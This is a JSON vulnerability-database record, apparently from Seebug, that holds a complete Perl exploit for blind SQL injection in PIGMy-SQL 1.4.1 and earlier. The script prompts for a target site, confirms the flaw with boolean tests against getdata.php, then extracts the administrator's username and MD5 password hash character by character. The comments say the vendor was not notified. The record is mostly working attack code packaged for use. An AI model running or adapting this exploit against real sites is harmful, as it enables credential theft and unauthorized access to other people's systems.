{"lastseen": "2017-11-19T13:34:29", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T13:34:29"}, "dependencies": {"references": [], "modified": "2017-11-19T13:34:29"}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-65297", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:65297", "title": "PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 0, "sourceData": "\n #!/usr/bin/perl\r\n\r\n# - PIGMy-SQL &#60;= 1.4.1 Blind SQL Injection Exploit -\r\n# PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the..\r\n#\t..vulnerable page only returns a picture we have to use a blind sql script, heres a little one i coded below, it will be alot faster using things like sqlmap etc. but this does the job\r\n#\r\n# Discovered And Coded By: t0pP8uZz\r\n# Discovered On: April 4 2008\r\n# Vendor has not been notifed!\r\n# Admin login is at /admin/\r\n# passwords are encrypted in MD5\r\n# END OF\r\n\r\nuse strict;\r\nuse LWP::Simple;\r\n\r\nprint &#34;--------------------------------------------------\\n&#34;;\r\nprint &#34;- PIGMy-SQL &#60;= 1.4.1 Blind SQL Injection Exploit -\\n&#34;;\r\nprint &#34;- Coded And Discovered By t0pP8uZz -\\n&#34;;\r\nprint &#34;- -\\n&#34;;\r\nprint &#34;- This exploit will obtain the admin user/pass.. -\\n&#34;;\r\nprint &#34;- ..Using a blind sql injection attack -\\n&#34;;\r\nprint &#34;--------------------------------------------------\\n&#34;;\r\n\r\nprint &#34;\\nTarget Site: &#34;;\r\n\tchomp(my $url=&#60;STDIN&#62;);\r\n\t\r\nprint &#34;Valid Photo ID: &#34;;\r\n\tchomp(my $pid=&#60;STDIN&#62;);\r\n\r\nif(inject_test($url, $pid)) {\r\n\r\n\tprint &#34;\\nInjecting Please Wait.. This could take several minutes.\\n&#34;;\r\n\tmy $result = blindattack($url, $pid);\r\n\tprint &#34;Exploited! Admin Details Are: &#34;.$result;\r\n\texit;\r\n}\r\n\r\nsub blindattack {\r\n\r\n\tmy $url = shift;\r\n\tmy $pid = shift;\r\n\tmy $done = 0;\r\n\tmy $substr = 1;\r\n\tmy $chr = 48;\r\n\tmy $res = undef;\r\n\t\r\n\twhile($done == 0) {\r\n\t\tmy $content = get($url.&#34;/getdata.php?id=&#34;.$pid.&#34; and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),&#34;.$substr.&#34;,1))=&#34;.$chr.&#34;/*&#34;);\r\n\t\t\r\n\t\tif($content =~ /#/ && $chr == 94) { $done = 1; }\r\n\t\t\telsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; }\r\n\t\t\t\telse { $chr++; }\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\nsub inject_test {\r\n\r\n\tmy $url = shift;\r\n\tmy $pid = shift;\r\n\t\r\n\tmy $true = get($url.&#34;/getdata.php?id=&#34;.$pid.&#34; and 1=1&#34;);\r\n\tmy $false = get($url.&#34;/getdata.php?id=&#34;.$pid.&#34; and 1=2&#34;);\r\n\t\r\n\tif($true =~ /#/ && $false !~ /#/) { \r\n\t\tprint &#34;\\nTarget Vulnerable!&#34;;\r\n\t\treturn 1;\r\n\t}\r\n\telse {\r\n\t\tprint &#34;Target not vulnerable! die&#39;ing!&#34;;\r\n\t\texit;\r\n\t}\r\n}\r\n\r\n# milw0rm.com [2008-04-04]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65297", "type": "seebug", "objectVersion": "1.4"}

{}